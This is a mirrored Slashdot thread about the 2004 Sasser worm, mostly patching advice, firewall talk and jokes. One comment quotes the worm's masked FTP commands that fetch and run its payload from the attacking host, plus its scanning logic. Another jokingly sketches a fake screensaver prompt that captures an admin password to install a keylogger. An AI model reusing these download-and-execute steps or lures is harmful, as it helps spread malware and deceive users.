Slashdot Mirror
New Windows Worm on the Loose
Dynamoo writes "The Internet Storm Center has issued a Yellow Alert due to the spread of the Sasser worm exploiting Windows 2000 and XP machines through a documented flaw in the Local Security Authority Subsystem Service (LSASS) as described in Microsoft Bulletin MS04-011. Initial analysis seems to indicate classic Blaster-style worm behaviour. Right now I'm just getting a probe every 10 minutes or so on my firewall, but this is bound to escalate sharply as the pool of infected machines grows. Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? More information at Computer Associates, F-Secure, Symantec and McAfee."
the luxury of being behind a nat box with all ports off and not having to deal with such nonsense
What is this 'Windows Update' of which you speak?
Liberals call everyone Nazis yet they are the closest thing to it.
Mutexes are named consistently enough under Windows that I wish somebody would make a program that simply caught all attempts at gaining a mutex and popped up a dialog window if the mutex hadn't been seen before. This would stop most any new software from running without first checking with the user. This is no good for a server of course, but ideal for a workstation.
This would also be great for catching spyware crap installs, as well as things like the RealPlayer toolbar that keeps popping up adverts by default. Simply tell the mutex checker to decline the requested mutex from then on and it would have the mutex always fail from then on -- then those programs could never be run again.
A new worm?Oh, there it is.
Trolling is a art,
For anyone already infected, Microsoft has manual removal instructions for the worm, located here:
. asp
http://www.microsoft.com/security/incident/sasser
Atleast for me as the local consumer support guy.
Thanks Microsoft.
A smile crept across my face after reading this story and then noticing a microsoft ad underneath informing the reader that Windows Server cost of ownership is lower than Linux cost of ownership!
The add server must be based on Microsoft's new Irony.NET framework!
Since most users don't have a firewall and don't use Windows Update, I wonder how many machines will be infected by Monday? Seriously now, it's getting old now. Good thing I'm using Linux now.
No need, I receive all the Windows critical updates by email. I don't know how I got subscribed to that mailing list, but it's damn convenient.
I have a Mac, you insensitive clod...
Where the value of X-Mailer: is the true measure of a man...
You know, normally these updates are available a good 3 or 4 months before the worm becomes available. This one was updated about 3 days ago. And MS claims to be beefing up their security efforts. ...
In light of this, would someone please explain why I would ever want a Mac? None of the really good viruses or worms are ever ported to it, no matter how successful they are!
More information at Computer Associates, F-Secure, Symantec and McAfee.
Where's Panda in that list? Personally I prefer Panda over those.
I'm impressed that they got the headline right!
Seriously, hasn't MS learnt anything about the Internet yet? Why do they keep insisting to keep all of these ports open all the time? Why so many services running out of the box? Why can't people even close some of the listening ports?
If MS was any serious about security, they would have all ports closed be default. Or at least have a possiblity to closing them down during install.
It then connects to that shell, and executes the following commands (cleaned up to get past slasdot's junk filter):
open XXX.XXX.XXX.XXX 5554
anonymous
user
bin
get XXXXX_up.exe
bye
XXXXX_up.exe
If successful, those commands ftp to the attacking host, port 5554, and download the actual worm payload. That payload is executed, and the host is fully infected. It then opens an FTP port on port 5554, and begins scanning for vulnerable hosts. Here's the scanning logic, from symantec:
The IP addresses generated by the worm are distributed as follows:
50% are completely random
25% have the same first octet as the IP
address of the infected host
25% have the same first and second octet as the IP address of the infected host.
The worm starts 128 threads that scan randomly-chosen IP addresses. This demands a lot of CPU time and as a result an infected computer may be so slow as to be barely useable.
See:
I want a tarpit option for FreeBSD's ipfw, the same way there is for Linux. It'd be nice to do something to slow this thing down...not that it's easy to tell this worm apart from everything else cluttering up my firewall logs.
Carousel is a lie!
1) IE won't work (joking aside it just doesn't work at all). This happened a long time ago, so I switched to mozilla. I thanks ms for this cause moz. owns.
2) Add/Remove programs, I can no longer see the text to describe the program install. It's all grey. An icon shows, so I can uninstall that way. Its not the colo scheme either, I tried MS default and it still didn't work.
3) I was having problems with this latest worm, but patching fixed everything, so now we wait to see what broke.
All and all I'm getting extremely close to wiping the HDD, and dual booting Slackware Linux (which has been on my laptop for over a year and I love it) and win98se for games. All the backups are current, and I'm waiting for the next problem to make the system more unsuable. If I wasn't so damn lazy, this would of been done sooner.
BrendanThe worm seems to install a ftp server on infected machines. So, wouldn't it be nice to have every box that detects a connection on port 554, reply with an upload of a new wallpaper to the infected windows box with some message like "install a firewall, moron"
I consider it a public service. Maybe you can even deduct the bandwith for the upload from you tax.
The patches were released on the 13th of April, there were four patches, of which, put togeather, they patch 20 different vunerabilities.
My email addy? should be easy enough.
I REALLY hate working dial-up tech support.
(ring)
sigh....
Don't these worm writers learn anything?
In addition to TCP 1025, the following ports are vulnerable to the LSASS exploit: TCP 135, 139, 445, and 593. UDP 135, 137, 138, and 445.
t in /MS04-011.mspx
Sasser generates traffic on TCP ports 445, 5554 and 9996.
The patch for the vulnerability (MS04-011) can be installed through Windows Update or located at the following URL:
http://www.microsoft.com/technet/security/bulle
This link should work for the symantec description of Sasser. Sangloth I'd appreciate any comment with a logical basis...it doesn't even have to agree with me.
after reading this on the /. front page, i runned the windows update, that i don't visit for more than a year...
and after some time, a windows pops up with the text:
"The software you are instaling has not passed the Windows Logo testing to verify its compatibility with Windows XP. bla bla bla"
"This software will *not be instaled*. Contact your system administrator."
Ok, so i contact myself, and wonders what the hell?!?
I just give M$ a lot of information about the operating system that i'm running... they wrote the frign thing, and even so, they don't know what will run in it, or what will pass their own crap compatibility verification!
but well, that's it... i just click "OK" --the only button-- and see the same windows appears 3 times more... and blissfuly keep my ignorance of what's going on with the instalation.
Only consumer whores and other types of idiots choose to toss out the computer instead of just wiping the hard drive and installing something else.
Speaking of worms, how easily could worms spread if it were Linux that was popular and not windows?
I know linux is more secure, especially because of the multi-user system where root is only used for special reasons, and that many windows programs are integrated in the OS (IE, Outlook...), but how feasible WOULD it be to make worms for Linux? I really don't know. I do use Linux, and I love it. I only boot into windows for certain things such as Battlefield 1942...
---
Never criticize religion on Slashdot. You will be modded down for "Troll" no matter how factual it is.
How refreshing. A Slashdot article about a worm exploiting Windows, without the usual childish jibes. Or FUD. Or spelling mistakes. Well done, Dynamoo!
Of course, then came the comments... :-)
... if we replaced the posts of this thread with the messages posted after a previous worm-announcement, would anyone notice ? :)
;-)
Linux_Zealot says : 5 Insightful - I am using Linux now !
M$_wizard : 5 Interesting - Worms always appear after a security notice from Microsoft Knowledge Base ; so, openness is bad !
security_Teacher : 5 Insightful - Of course, no one should run anything as root but cricital administration tasks, and a firewall is essential.
n00b : -1 Troll - Windows Sucks !!!
Well... That's just a little... repetitive
After I changed email address, I couldn't figure out where I'd subscribed to that newsletter, either... I'd really like it back...
Why weren't you running a firewall?
:)
I usually set people up with the free version of ZoneAlarm. It stops most of these worms. Several people I know don't have this patch yet, but ZoneAlarm stopped the worm.
Also, my gaming machine (my only one running windows) was fine because it was behind a linux firewall/router
This statement is forty-five characters long.
Everyone knows not to use windows products until after at least 1 service pack, this is an old problem that was fixed with service pack 1. I hope no one on /. is affected by this, because even if you miss most updates, the service packs are the important ones.
I run Windows XP Pro at home so this post raised my concern at first, but if anyone actually read the Microsoft security bulletin, you would all know this.
Before I get flamed for running Windows, that box mostly just runs games, though sometimes I have it running distccKNOPPIX to help cross-compile for my Gentoo Box, its time to rebuild again now that 2004.1 came out!!!!
~ there are 10 types of people in this world, those that can read binary and those that can't
This is like a freaking death sentence considering everyone in town thinks that this is there own free computer tech support hot line.
I had stopped ZA from starting up by default for the past few days, but I enabled it which allowed me to grab that one patch.
The worm can be removed with McAfee's stinger tool (the Mcafee link has a link to it).
Systems all clear.
www.google.com
So for the past few days, I've had to live with part of my bandwidth getting chewed up by incoming packets that don't actually do anything but take up space. It effectively slowed the speed of downloads by about half. The rate of packets is starting to slow down now... finally (I guess as people patch their systems), but it still was highly annoying.
Anyways, I called my ISP when I first noticed it 3 days ago (after checking it with ethereal), and asked if they could help. They told me that this was caused by filesharing programs, which I knew wasn't the case becuase in fact the only port 445 stuff I've done is windows filesharing, and I've secured the one and only Windows system on my LAN against IP addresses other than other ones on my LAN from being able to access them. Needless to say, this answer did not impress me. Here I was, effectively being subjected to a DoS attack, and they are trying to tell me this is _my_ fault? Man, if I had any other choice for high speed internet, I'd be switching in a heartbeat.
Anyways, that's my story. Things like this totally bite because you can have a firewall and all the security precautions in the world, but worms like this still chew up your bandwidth.
File under 'M' for 'Manic ranting'
I use the best anti virus on the market! It is called a Mac! Actually I have both a Mac and a WindowsXP Pro box with a router and firewall. Just to keep things clean my windows machine is NEVER used for checking mail. All mail is handled through the Mac. If I have a need to send mail via the PC or need to check it from the PC for some reason then Eudora Pro is used. The Outlook variants are the biggest viri available for the PC....with explorer coming in a close second.
I pity my educational counterparts in other districts...one in particular has probably a dozen Win2K/W2K3 machines sitting outside the firewall...no protection whatsoever. No, they do not do regular updates...just when something breaks. Oh well, they'll just hire their friendly neighborhood MCSE consultants to come in at $150 an hour to "sell them some protection." It seems like it's always firefighting with Windows anymore...And no, I do NOT run Windows on any server in my district...
most of these problems they have (certain virii, spyware adware) could be alleviated and less of a threat simply by running limited user accounts instead of running as an "admin" all the time.
tested this in my home network (the other half has to have windows) her rights are set by a samba acting as a PDC(i was bored), but basically boils down to a simple matter of her account is considered a "limited account" to her local XP machine...if something needs to be installed or needs admin rights she can explicitly tell it to by using the run as...
i've went from cleaning 50+ items / week off that machine to maybe 3-4 and those are simply cookies being reported as "spyware".
Here is an introduction to virus for non-windows users.
{{.sig}}
Wow. I just got that virus this morning (and I'm on a dial-up modem!!!). I had no idea what was going on, but I figured it was a virus. I saw a new program in the "Tasks" window, so I closed the window, found and deleted the file, and destroyed the Registery Key that it had made for reference in MSCONFIG.EXE. That was all there was to it! I'm glad that the creator of the virus was either a dork or a "nice" virus creator and made the virus very easy to get rid of.
Of course, here on slashdot, it's common enough to correctly identify this sort of malware as a "windows worm," but if this terminology could make it into the more general media, it might raise the general consciousness to make people more aware of the alternatives to Windows. Maybe some informed and polite letters to your local newspaper might make a difference.
Every pc user with a brain should have a firewall and anti virus sofware running.
Concidering how I only use Windows to play games and burn CD's, I don't really care what worm get on it as long as it don't damage the hardisk. It is a bother to install a AV program when I spend so little time on Windows. btw, I am behind a firewall/router.
And AV isn't the only solution. My dad has the same laptop for at least 7 years now and it never got a virus. I guess that it is still running win95 from when he bought it has something to do with it....
Cheers,
RoadkillBunny
There are several modes for the "automatic" updates; some depend on OS/SP and if you have SUS/WUS installed. (if its a work laptop, they may have SUS/WUS configured for the updating process.)
In 2k and XP, you can
1- do nothing
2- Ask before downloading and before installing. (only admin users can say yes)
3- download updates automatically, but ask for installation (only admin users can install; they are asked if you they want to go ahead with the install)
4- automatically install at a fixed time (default 2 or 3 am); if a reboot is needed when a user logs in, it asks to reboot.
by default its #3.
in 2k, the option can be changed in the control panel (sp3 or higher needed).
in XP, right click on "my computer", properties, go to the automatic updates tab.
--
Time is on my side
try using a google cache.
i've told soo many others by so now, so i might as well put it on slashdot
Blah blah sig blah blah blah irony blah blah
" Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you? " roflol windows-update is the virus factory ;)
http://fedora.redhat.com
http://www.gentoo.org
http://www.debian.org
http://www.linux-mandrake.com
http://www.slackware.com
"Ha Ha!"
Nelson, various Simpsons episodes
No electrons were harmed creating this post, though some may have been subjected to electrical and/or magnetic fields.
Your ideas intrigue me. I'd like to subscribe to your newsletter.
> If I was in charge of a university's computer systems,
> absolutely no proprietary, closed source software would be
> allowed anywhere on my network, especially not the parts
> accessible to students
So, preventing your students from being unable to run Mathematica, Maple, Matlab, Visual Studio,... is educationally beneficial in what way?
Yes, closed source software has problems. So does open source. An all-out ban either way helps no one and solves nothing.
You say "killing IE" like it's a bad thing.
Je fume. Tu fumes. Nous fûmes!
normally my home firewall (linux of course) logs about 100k bytes in messages per day (i have iptables log all dropped packets). Today alone its over 50 megs. Normally i have logrotate.conf set for weekly rotations, but i switched it to daily, and made sure my var partition has more then enough room (3 gigs free, so i think i am ok).
Lawyers, MBA's, RIAA? A jedi fears not these things!
Otherwise it would be called "Microsoft Walls"
Our student dorm has its own network volunteer group, which I'm part of. This worm made a big entrance tonight, scoring 27 infections in two hours, on a network comprising about 300 machines, maybe 220 of which are running Windows. We had to take the suckers off the network AND because that's part of our self-imposed policy, drop a filled-in piece of paper into their letter boxes. I felt like the mail man, running around in the entrance hall with a wad of papers under my arm. Oh, and our upstream ISP got pissed at us, threatening to cut our connection alltogether. To sum it all up, I'm going to kill the guy who wrote this, right after I cheerfully refuse to reconnect all the suckers who fell for it!
Divide et impera!
New Windows Worm on the Loose
What, it's been a week already?
Using Symantec AV, I LiveUpdate'd signatures, only to find that it decared System32/w32sup.exe as a trojan and quarantined it.
Here's a copy of a notice we've been sending to customers on this issue:
c ription&virus_k=125007c /data/w32.sasser.worm.html
n /MS04-011.mspx
.ASP or .CFM, that's an indication the system may be running on a MS server and potentially more vulnerable).
There's another worm spreading across the Internet, called the "Sasser Worm".
Vulnerable systems include: Windows 2000, Windows Server 2003, Windows XP
See:
http://us.mcafee.com/virusInfo/default.asp?id=des
http://securityresponse.symantec.com/avcenter/ven
Microsoft security bulletin on the vulnerability:
http://www.microsoft.com/technet/security/Bulleti
Among other things, this worm installs an ftp server and a remote shell system to further propagate itself across Windows. It likely has the capability of giving remote users full access and control of the compromised machine, therefore any data on the system may be vulnerable.
Once a machine is infected, it starts 128 instances of itself, trying to spread the worm to other Microsoft PCs. The worm also attempts to disable the ability to shut down or restart the computer/server. The worm may also compromise the "system restore" function under some versions of Windows, so trying to revert back to an older configuration setup might reinstate the compromise!
As you might expect, our servers here are NOT directly affected or vulnerable. However, this is another "blaster" type worm which, once it infects a vulnerable Microsoft system, begins to randomly bombard other systems all around the Internet. The end result will be potentially severe denial-of-service attacks to all systems (in other words, services may be slow or unresponsive due to the traffic increase on the Internet from compromised systems).
We're going to have to wait until Monday to probably see the full-effect of this worm. The ability it will have to disrupt major services online is going to depend upon whether or not people have been routinely running Windows Update (http://windowsupdate.microsoft.com/).
If you are running a vulnerable system (Windows Server 2000/2003 and XP are vulnerable; Windows 95/98/ME are not vulnerable) and haven't run Windows Update in the last two weeks, there's a good chance you are vulnerable, if not infected if you are not behind a firewall and have been online for awhile.
This is yet another annoyance for most of us with Windows on our client PCs. By now everyone should be in the habit of automating or running Windows Update every few days.
The real problem are ISPs and web hosting companies that are using Microsoft NT/200x Server and XP for Internet based services. (And we don't do this but there are tons who do) This is particularly dangerous for e-commerce applications. The admins of these servers have to be forever diligent in making sure their systems are secure. Who knows what critical information (customer data, credit card numbers, etc.) are sitting around on these machines. It seems every week there's a new major vulnerability with Microsoft's servers. This is why we don't use MS products for e-commerce and critical services -- we don't want to risk the security of our clients. I urge everyone to be careful about providing e-commerce to systems running Microsoft servers - they have proven to be exponentially more vulnerable than Unix/Linux counterparts. (if you visit a web page and you see URLs with filenames like
As usual, those of us that do run secure systems are now going to be hammered by infected systems so bear with us while we hold out to see if admins of Microsoft Servers can fix their problems fast before their machines spam the Internet with data and cripple everyone else.
Of course all good Windows-using Slashdotters visit Windows Update regularly and have a firewall, don't you?
Should read "Of course, all good Slashdotters patch their systems and have a firewall, don't you?".
Running something other than Windows is not a good reason to ignore security.
And in other news ... Delta flights grounded today due to "a computer glitch"
I have to wonder...
...but how feasible WOULD it be to make worms for Linux?
"Here's your new screensaver!
You will be prompted for the admin password so we can install this and set it up.
[prompt] - Install screensaver|install [keylogger/SMTP/ZombieClient]
Please enter your admin password again to verify the settings for security
Thank you! We appreciate your business! Click here to send this to all your friends!"
Currently, Linux is more secure because, among other things, its users are generally more clued up. Put the general Bonzi fan on Lindows, and you'd see much the same thing.
I work doing tech support for desktop computers made by Compaq and HP, both of which are sold at Wal-Mart. A friend of mine said "welcome to Hell" when I came in today. Now I know why :^(
It's better to vote for what you want and not get it than to vote for what you don't want and get it.
- E. Debs
Centralization breaks the internet.
warning: attempt at humour follows.
...er where did he go?
Windows' House
A worm appears. Windows is surprised.
Enter Worm
Windows (moronically): duh hello? What are you doing in here?
Worm (aloof): Hey windows, how's it goin? Just wonderin' if I could, ya know, come on in for a bit. I know you don't really know me and all, but I just kinda found you here..
Windows: duh you look like an old friend.. what's his name, Bob.. Blast.. something or other. Ok since you're already here, it's not much, but there's a nice breeze that blows through.
Worm: Can I leave some of my stuff here?
Windows: Ok by me, there's a whole bunch of stuff here, people come by all the time picking stuff up, dropping it off. (helpfully) Let me take that for you.
Worm: Nice! Ummm, while I'm here, I have some code, and I just need a bit... err.. executed. Is that ok?
Windows (wary): Well... I don't know you that well.
Worm: C'mon, please? I'm friends with that guy in, uh, the service department, obviously I couldn't get in if he didn't let me in.
Windows (relieved): Oh him! Oh yeah, he's friends with a lot of people. Ok, I'll execute the code... there ya go all done.
Worm: Excellent. Ok, gotta go.
Enter Zone Alarm
Zone Alarm (alarmed): What's all this then? Who's this guy? Where is he trying to go? Why wasn't I alerted?!
Windows: Oh, he's just... a guy.. he came in for a bit.
Zone Alarm: How did he get in??
Windows (frustrated): Through the service entrance, I told you I got a lot of things going through there and don't want you bothering me about it all the time. The last time you blocked off the service entrance noone could get through.
Zone Alarm: Well don't let him out...
Exuent Worm
Zone Alarm:
Windows (ashamed): Out the service entrance.
Zone Alarm: That's it I quit.
Exuent Zone Alarm
THE END
Yeah, but not everyone is as fastidious as you. In my line of work, I have experienced all sorts of idiots who shouldn't be allowed to use a pocket calculator, never mind the Internet. I've had to deal with people who don't know the difference between an e-mail address and a website URL, and even one person who didn't know the difference between an e-mail address and their own name! And the scary part is, these were the most tech-literate people working for their own companies. I've tried saying to people, "Get your IT person to set your Outlook Express {they always use that, despite the fact that anyone with half a brain knows how terrible it is} up with these parameters ....." and found that the clueless tosser on the other end was the IT person. {Even if our internal "no source, no sale" policy didn't forbid using Outlook Express our end, it would still be such a horrible buggy piece of software we wouldn't touch it with a barge pole; but these people insist on using it}. If they were running Linux, I could just get them to temporarily set a new root password, SSH into their box, set everything up for them, and that would be Job Done.
Well-set-up Windows systems can be much more secure than badly-set-up Linux systems. The trouble is that Linux users tend to {have to} be more clued-up. Part of the problem is the way Windows is pre-installed on so many machines. The supplier has to keep everything as general-purpose as possible, because they don't know what requirements the user's ISP will place on them -- which, in practice, means rather permissive defaults. In turn, the fact that it just works at first, despite the unnecessary ports and services, leads users not to think about security until it's too late already. With Linux {some obsolete RedHat versions excepted}, everything starts off inactive -- you have to select only what you want to allow. But that probably would also happen if users had to install Windows for themselves; or, even if pre-installed Windows systems had to be configured up from a "deny-all" situation. It means you have to use your brain a little bit, but that's hardly a bad thing -- as harsh as this may sound, it's more important that the job should be done properly, for the sake of other Internet users, than easily and maybe badly.
Je fume. Tu fumes. Nous fûmes!